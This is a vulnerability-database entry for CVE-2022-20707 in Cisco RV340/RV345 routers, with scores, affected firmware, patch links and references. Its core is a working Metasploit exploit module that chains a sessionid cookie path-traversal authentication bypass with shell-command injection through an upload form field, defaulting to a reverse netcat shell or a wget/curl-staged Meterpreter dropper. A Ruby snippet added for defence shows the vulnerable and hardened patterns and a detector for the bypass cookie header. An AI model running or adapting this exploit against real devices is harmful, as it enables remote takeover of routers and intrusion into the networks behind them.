ID

VAR-202202-0322


CVE

CVE-2022-20707


TITLE

Multiple Cisco Small Business RV Series routers out-of-bounds write vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2022-004815

DESCRIPTION

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to execute arbitrary code, elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS). For more information about these vulnerabilities, see the Details section of the Cisco advisory.

Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be disclosed or tampered with, and service operation may be interrupted (DoS).

The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the www-data user.

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below.

The Metasploit module from Packet Storm 170988 follows. The extract on this page begins inside the module's info hash, so the class header, mixins, 'Name' and 'Description' entries are reconstructed only as far as the methods used (send_request_cgi, CheckCode, execute_cmdstager) require; the 'Name' and 'Description' values are not on the page and are left out.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      # Mixins inferred from the methods the module calls; the original header is cut off in this extract.
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager

      def initialize(info = {})
        super(
          update_info(
            info,
            # 'Name' and 'Description' are cut off in this extract of the module.
            'License' => MSF_LICENSE,
            'Platform' => ['linux', 'unix'],
            'Author' => [
              'Biem Pham', # Vulnerability Discoveries
              'Neterum', # Metasploit Module
              'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb
            ],
            'DisclosureDate' => '2021-11-02',
            'Arch' => [ARCH_CMD, ARCH_ARMLE],
            'References' => [
              ['CVE', '2022-20705'], # Authentication Bypass
              ['CVE', '2022-20707'], # Command Injection
              ['ZDI', '22-410'], # Authentication Bypass
              ['ZDI', '22-411'] # Command Injection
            ],
            'Targets' => [
              [
                'Unix Command',
                {
                  'Platform' => 'unix',
                  'Arch' => ARCH_CMD,
                  'Type' => :unix_cmd,
                  'Payload' => { 'BadChars' => '\'#' },
                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
                }
              ],
              [
                'Linux Dropper',
                {
                  'Platform' => 'linux',
                  'Arch' => [ARCH_ARMLE],
                  'Type' => :linux_dropper,
                  'Payload' => { 'BadChars' => '\'#' },
                  'CmdStagerFlavor' => [ 'wget', 'curl' ],
                  'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' }
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'RPORT' => 443,
              'SSL' => true,
              'MeterpreterTryToFork' => true
            },
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
            }
          )
        )

        register_options(
          [
            OptString.new('TARGETURI', [true, 'Base path', '/'])
          ]
        )
      end

      # sessionid utilized later needs to be set to length
      # of 16 or exploit will fail. Tested with lengths
      # 14-17
      def generate_session_id
        return Rex::Text.rand_text_alphanumeric(16)
      end

      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => '/upload',
          'headers' => {
            'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
          }
        }, 10)

        # A proper "upload" will trigger file creation. So the send_request_cgi call
        # above is an incorrect "upload" call to avoid creating a file on disk. The router will return
        # status code 405 Not Allowed if authentication has been bypassed by the above request.
        # The firmware containing this authentication bypass also contains the command injection
        # vulnerability that will be abused during actual exploitation. Non-vulnerable
        # firmware versions will respond with 403 Forbidden.
        if res.nil?
          return CheckCode::Unknown('The device did not respond to request packet.')
        elsif res.code == 405
          return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
        elsif res.code == 403
          return CheckCode::Safe('The device is not vulnerable to exploitation.')
        else
          # Catch-all
          return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
        end
      end

      def execute_command(cmd, _opts = {})
        res = send_exploit(cmd)

        # Successful unix_cmd shells should not produce a response.
        # However if a response is returned, check the status code and return
        # Failure::NotVulnerable if it is 403 Forbidden.
        if target['Type'] == :unix_cmd && res&.code == 403
          fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
        end

        if target['Type'] == :linux_dropper
          fail_with(Failure::Unreachable, 'The target did not respond') unless res
          fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
          begin
            body_json = res.get_json_document
            fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
          rescue JSON::ParserError => e
            print_error("Failed: #{e.class} - #{e.message}")
            fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! It is possible the response is not JSON.')
          end
        end

        print_good('Exploit successfully executed.')
      end

      def send_exploit(cmd)
        filename = Rex::Text.rand_text_alphanumeric(5..12)
        fileparam = Rex::Text.rand_text_alphanumeric(5..12)
        input = Rex::Text.rand_text_alphanumeric(5..12)
        # sessionid utilized later needs to be set to length
        # of 16 or exploit will fail. Tested with lengths
        # 14-17
        sessionid = Rex::Text.rand_text_alphanumeric(16)
        # This file must exist and be writeable by www-data, so the temporary upload file is used to prevent issues.
        filepath = '/tmp/upload.input'
        pathparam = 'Configuration'
        # The injected command closes the single-quoted argument and comments out the rest of the line.
        destination = "'; " + cmd + ' #'

        multipart_form = Rex::MIME::Message.new
        multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
        multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
        multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
        multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
        multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
        multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))

        # Escaping "/tmp/upload/" folder that does not contain any other permanent files
        send_request_cgi({
          'method' => 'POST',
          'uri' => '/upload',
          'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
          'headers' => {
            'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
          },
          'data' => multipart_form.to_s
        }, 10)
      end

      def exploit
        print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
        case target['Type']
        when :unix_cmd
          execute_command(payload.encoded)
        when :linux_dropper
          execute_cmdstager(linemax: 120)
        end
      end
    end
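The description above pairs two defect classes: a cookie value used as a file path without validation (the sessionid authentication bypass) and a form field spliced into a shell command (the destination injection the module abuses). The following Ruby is an added illustration written for this page, not code from the Metasploit module, Cisco, or ZDI. It shows each vulnerable pattern next to a hardened version and a small Cookie-header check that flags the duplicate-sessionid trick; the session directory, function names and the sample headers are assumptions constructed for the demo.

```ruby
require 'pathname'

# Assumed location of session files for this demo (not a Cisco path).
SESSION_DIR = Pathname.new('/tmp/demo_sessions')

# Vulnerable pattern: the raw cookie value becomes part of the path, so a value of
# "../../www/index.html" names a file that always exists and a naive
# "does a session file exist?" check passes for an unauthenticated client.
def session_file_vulnerable(cookie_value)
  File.join(SESSION_DIR.to_s, cookie_value)
end

# Hardened: accept only the shape a real token has (16 alphanumerics, the length the
# module comments say works) and, as defence in depth, confirm the resolved path is
# still inside SESSION_DIR. Returns nil for anything else.
def session_file_safe(cookie_value)
  return nil unless cookie_value.match?(/\A[A-Za-z0-9]{16}\z/)

  base = SESSION_DIR.expand_path
  path = (base + cookie_value).expand_path
  return nil unless path.to_s.start_with?(base.to_s + '/')

  path.to_s
end

# Vulnerable pattern: the "destination" field is quoted into a shell string.
# A value of "'; id #" closes the quote, runs id, and comments out the rest.
def move_command_vulnerable(src, destination)
  "mv '#{src}' '#{destination}'"
end

# Hardened: no shell at all (an argv array for Process.spawn / Open3) plus an
# allow-list on the destination name; "--" keeps mv from treating a name that
# starts with "-" as an option.
def move_argv_safe(src, destination)
  unless destination.match?(/\A[A-Za-z0-9][A-Za-z0-9_.\-]{0,63}\z/)
    raise ArgumentError, "rejected destination: #{destination.inspect}"
  end

  ['mv', '--', src, destination]
end

# Detection: parse a Cookie header the way a permissive parser does (split on ';',
# split each pair on the first '=', strip whitespace) and flag either more than one
# "sessionid" or a sessionid value that is not purely alphanumeric.
def bypass_cookie?(cookie_header)
  pairs = cookie_header.split(';').map { |kv| kv.split('=', 2).map(&:strip) }
  session_values = pairs.select { |name, _| name == 'sessionid' }.map { |_, v| v.to_s }
  return true if session_values.size > 1

  session_values.any? { |v| !v.match?(/\A[A-Za-z0-9]*\z/) }
end

# Constructed sample headers for the demo (not captured traffic). The second one has
# the shape the module sends: "sessionid " with a trailing space, then a real-looking id.
SAMPLE_HEADERS = {
  'legit' => 'sessionid=Ab3dEf9hIj2kLm5n',
  'bypass' => 'sessionid =../../www/index.html; sessionid=Ab3dEf9hIj2kLm5n'
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_HEADERS.each { |label, hdr| puts "#{label}: bypass=#{bypass_cookie?(hdr)}" }
  puts session_file_vulnerable('../../www/index.html')
  puts session_file_safe('../../www/index.html').inspect
  puts move_command_vulnerable('/tmp/upload.input', "'; id #")
  puts move_argv_safe('/tmp/upload.input', 'backup.cfg').inspect
end
```

The cookie check is only a heuristic for a front-end proxy or WAF; the real fix is the one the hardened functions show, validating the token before any file operation and never passing user input through a shell.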

Trust: 3.69

sources: NVD: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // PACKETSTORM: 170988

AFFECTED PRODUCTS

vendor | model | scope | version | Trust
cisco | rv340 | - | - | 2.1
cisco | rv340w | <= | 1.0.03.24 | 1.0
cisco | rv345p | <= | 1.0.03.24 | 1.0
cisco | rv340 | <= | 1.0.03.24 | 1.0
cisco | rv345 | <= | 1.0.03.24 | 1.0
Cisco Systems | rv345p dual wan gigabit poe vpn router | - | - | 0.8
Cisco Systems | rv340 dual wan gigabit vpn router | - | - | 0.8
Cisco Systems | rv340w dual wan gigabit wireless-ac vpn router | - | - | 0.8
Cisco Systems | rv345 dual wan gigabit vpn router | - | - | 0.8

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // JVNDB: JVNDB-2022-004815 // NVD: CVE-2022-20707

CVSS

SEVERITY

CVSSV2

CVSSV3

ZDI: CVE-2022-20707
value: HIGH

Trust: 1.4

nvd@nist.gov: CVE-2022-20707
value: HIGH

Trust: 1.0

ykramarz@cisco.com: CVE-2022-20707
value: CRITICAL

Trust: 1.0

NVD: CVE-2022-20707
value: HIGH

Trust: 0.8

ZDI: CVE-2022-20707
value: MEDIUM

Trust: 0.7

CNNVD: CNNVD-202202-169
value: HIGH

Trust: 0.6

VULMON: CVE-2022-20707
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2022-20707
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

nvd@nist.gov: CVE-2022-20707
baseSeverity: HIGH
baseScore: 7.3
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: 3.9
impactScore: 3.4
version: 3.1

Trust: 1.0

ykramarz@cisco.com: CVE-2022-20707
baseSeverity: CRITICAL
baseScore: 10.0
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: CHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 6.0
version: 3.1

Trust: 1.0

NVD: CVE-2022-20707
baseSeverity: HIGH
baseScore: 7.3
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

ZDI: CVE-2022-20707
baseSeverity: HIGH
baseScore: 7.8
vectorString: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.8
impactScore: 5.9
version: 3.0

Trust: 0.7

ZDI: CVE-2022-20707
baseSeverity: MEDIUM
baseScore: 4.3
vectorString: AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: 0.9
impactScore: 3.4
version: 3.0

Trust: 0.7

ZDI: CVE-2022-20707
baseSeverity: HIGH
baseScore: 8.8
vectorString: AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 0.7

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // CNNVD: CNNVD-202202-169 // NVD: CVE-2022-20707 // NVD: CVE-2022-20707

PROBLEMTYPE DATA

problemtype: CWE-121

Trust: 1.0

problemtype: CWE-787

Trust: 1.0

problemtype: Out-of-bounds write (CWE-787) [NVD evaluation]

Trust: 0.8

sources: JVNDB: JVNDB-2022-004815 // NVD: CVE-2022-20707

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202202-169

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-202202-169

PATCH

title: Cisco has issued an update to correct this vulnerability.
url: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D

Trust: 2.1

title: cisco-sa-smb-mult-vuln-KA9PK6D
url: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D

Trust: 0.8

title: Cisco Small Business Buffer error vulnerability fix
url: http://123.124.177.30/web/xxk/bdxqById.tag?id=183260

Trust: 0.6

title: Cisco: Cisco Small Business RV Series Routers Vulnerabilities
url: https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-KA9PK6D

Trust: 0.1

title: https://github.com/20142995/Goby
url: https://github.com/20142995/Goby

Trust: 0.1

title: Goby_POC POC count 1319
url: https://github.com/Z0fhack/Goby_POC

Trust: 0.1

title: CVE-2022-XXXX
url: https://github.com/AlphabugX/CVE-2022-23305

Trust: 0.1

title: CVE-2022-XXXX
url: https://github.com/AlphabugX/CVE-2022-RCE

Trust: 0.1

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // CNNVD: CNNVD-202202-169

EXTERNAL IDS

db: NVD, id: CVE-2022-20707

Trust: 5.5

db: ZDI, id: ZDI-22-419

Trust: 2.4

db: ZDI, id: ZDI-22-411

Trust: 2.4

db: ZDI, id: ZDI-22-409

Trust: 2.4

db: PACKETSTORM, id: 170988

Trust: 1.8

db: JVNDB, id: JVNDB-2022-004815

Trust: 0.8

db: ZDI_CAN, id: ZDI-CAN-15940

Trust: 0.7

db: ZDI_CAN, id: ZDI-CAN-15883

Trust: 0.7

db: ZDI_CAN, id: ZDI-CAN-15610

Trust: 0.7

db: CS-HELP, id: SB2022020301

Trust: 0.6

db: CNNVD, id: CNNVD-202202-169

Trust: 0.6

db: VULMON, id: CVE-2022-20707

Trust: 0.1

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // PACKETSTORM: 170988 // CNNVD: CNNVD-202202-169 // NVD: CVE-2022-20707

REFERENCES

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d

Trust: 3.8

url:https://www.zerodayinitiative.com/advisories/zdi-22-419/

Trust: 2.4

url:http://packetstormsecurity.com/files/170988/cisco-rv-series-authentication-bypass-command-injection.html

Trust: 1.8

url:https://www.zerodayinitiative.com/advisories/zdi-22-411/

Trust: 1.7

url:https://www.zerodayinitiative.com/advisories/zdi-22-409/

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2022-20707

Trust: 1.5

url:https://www.cybersecurity-help.cz/vdb/sb2022020301

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/787.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv340_lan/

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-20705

Trust: 0.1

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // PACKETSTORM: 170988 // CNNVD: CNNVD-202202-169 // NVD: CVE-2022-20707

CREDITS

Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)

Trust: 1.4

sources: ZDI: ZDI-22-411 // ZDI: ZDI-22-409

SOURCES

db: ZDI, id: ZDI-22-419
db: ZDI, id: ZDI-22-411
db: ZDI, id: ZDI-22-409
db: VULMON, id: CVE-2022-20707
db: JVNDB, id: JVNDB-2022-004815
db: PACKETSTORM, id: 170988
db: CNNVD, id: CNNVD-202202-169
db: NVD, id: CVE-2022-20707

LAST UPDATE DATE

2024-08-14T13:53:35.952000+00:00


SOURCES UPDATE DATE

db: ZDI, id: ZDI-22-419, date: 2022-02-22T00:00:00
db: ZDI, id: ZDI-22-411, date: 2022-02-22T00:00:00
db: ZDI, id: ZDI-22-409, date: 2022-02-22T00:00:00
db: VULMON, id: CVE-2022-20707, date: 2023-11-07T00:00:00
db: JVNDB, id: JVNDB-2022-004815, date: 2023-05-08T08:12:00
db: CNNVD, id: CNNVD-202202-169, date: 2023-02-15T00:00:00
db: NVD, id: CVE-2022-20707, date: 2023-11-07T03:42:41.160

SOURCES RELEASE DATE

db: ZDI, id: ZDI-22-419, date: 2022-02-22T00:00:00
db: ZDI, id: ZDI-22-411, date: 2022-02-22T00:00:00
db: ZDI, id: ZDI-22-409, date: 2022-02-22T00:00:00
db: VULMON, id: CVE-2022-20707, date: 2022-02-10T00:00:00
db: JVNDB, id: JVNDB-2022-004815, date: 2023-05-08T00:00:00
db: PACKETSTORM, id: 170988, date: 2023-02-14T15:32:53
db: CNNVD, id: CNNVD-202202-169, date: 2022-02-03T00:00:00
db: NVD, id: CVE-2022-20707, date: 2022-02-10T18:15:09.413